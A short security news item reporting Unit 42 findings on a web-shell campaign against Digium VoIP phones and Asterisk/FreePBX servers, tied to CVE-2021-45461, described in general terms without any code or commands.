Digium's VoIP phones have been targeted as part of an attack campaign to drop a web shell on their servers and download and execute additional payloads in order to steal sensitive data.
It also downloads new payloads for execution and schedules recurring tasks to re-infect the host system, according to Palo Alto Networks Unit 42 in a report released on Friday.
Asterisk, a widely used software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications Server, is the target of the unusual activity that began in mid-December 2021.
Israeli cybersecurity firm Check Point revealed in November 2020 that it had uncovered a campaign known as INJ3CTOR3 that resembles the intrusions, suggesting that they could be a "resurgence" of the earlier attacks.
FreePBX, a web-based open source GUI for controlling and managing Asterisk, was publicly disclosed in December 2021 of a now-patched remote code execution flaw at the same time as the surge. The CVE-2021-45461 vulnerability has a severity rating of 9.8 out of 10.
Once a remote dropper shell script has been obtained, the attacks begin with the installation of the PHP web shell in a variety of file system locations as well as the creation of two root user accounts for remote control.
It also creates a scheduled task that runs every minute and retrieves a remote copy of the shell script from the attacker-controlled domain.
Additionally, the malware has the ability to run arbitrary commands, which gives hackers access to the system and the ability to steal data while also maintaining a backdoor to the compromised hosts.
A "common approach malware authors take to launch exploits or run commands remotely" is "the strategy of implanting web shells in vulnerable servers," the researchers said, adding that it's "not a new tactic for malicious actors."
Post a Comment
Your suggestions and comments are welcome